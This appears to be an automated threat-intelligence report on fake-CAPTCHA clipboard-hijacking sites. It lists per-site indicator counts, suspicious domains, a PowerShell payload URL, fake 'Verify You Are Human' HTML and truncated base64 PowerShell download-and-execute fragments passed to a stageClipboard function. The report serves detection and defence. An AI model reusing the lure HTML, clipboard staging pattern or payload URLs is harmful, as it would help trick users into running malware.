Threat Intelligence Report
Attack Pattern Analysis
Top Indicators/Keywords
Malicious Sites Detected
Click on a site to view detailed analysis💻 PowerShell Commands 2
🔍 Suspicious Keywords 7
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
🔍 Suspicious Keywords 6
🌐 Extracted URLs 4
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
🔍 Suspicious Keywords 7
🌐 Extracted URLs 46
📋 Clipboard Manipulation Code
Showing first 1 of 1 entries (truncated for performance)
...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...
🔍 Suspicious Keywords 4
🌐 Extracted URLs 15
🔍 Suspicious Keywords 2
🌐 Extracted URLs 1
Technical Analysis
ClickGrab Threat Analysis Report - 2025-05-22
Most Common External Domains
- www.google.com: 23 occurrences
- use.fontawesome.com: 15 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- cdnjs.cloudflare.com: 13 occurrences
- www.blogger.com: 13 occurrences
- www.webgo.de: 10 occurrences
- t.me: 6 occurrences
- www.w3.org: 6 occurrences
- browser.certif-update.website: 4 occurrences
- svetvip.ru: 4 occurrences
Common Pattern Analysis
reCAPTCHA imagery (15 occurrences, 1 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (15 times)
Font resources (28 occurrences, 2 distinct URLs)
- https://use.fontawesome.com/releases/v5.0.0/css/all.css (15 times)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (13 times)
CDN hosted scripts (14 occurrences, 2 distinct URLs)
- https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css (13 times)
- https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
Google resources (25 occurrences, 9 distinct URLs)
- https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (15 times)
- https://www.google.com/intl/en/policies/privacy/ (2 times)
- https://www.google.com/intl/en/policies/terms/ (2 times)
- https://www.google.com (1 times)
- http://www.google.com/2005/gml/b (1 times)
- ...and 4 more distinct URLs
JavaScript Clipboard Analysis
Found clipboard manipulation code snippets in 30 places
document.execCommand copy
Found in 30 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
textarea manipulation
Found in 30 snippets (100.0% of clipboard code)
Fake CAPTCHA HTML Examples
Here's how the fake CAPTCHA verification appears in HTML:
Example 1:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Example 2:
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Command Context Analysis
Found 16 PowerShell download context snippets
stageClipboard Function
Found 13 references to stageClipboard function
Example stageClipboard contexts:
Example 1:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 2:
...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Example 3:
...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`; stageClipboard(commandToRun, verification_id); }...
Clipboard Attack Pattern Analysis
Insufficient data to reconstruct the complete clipboard attack pattern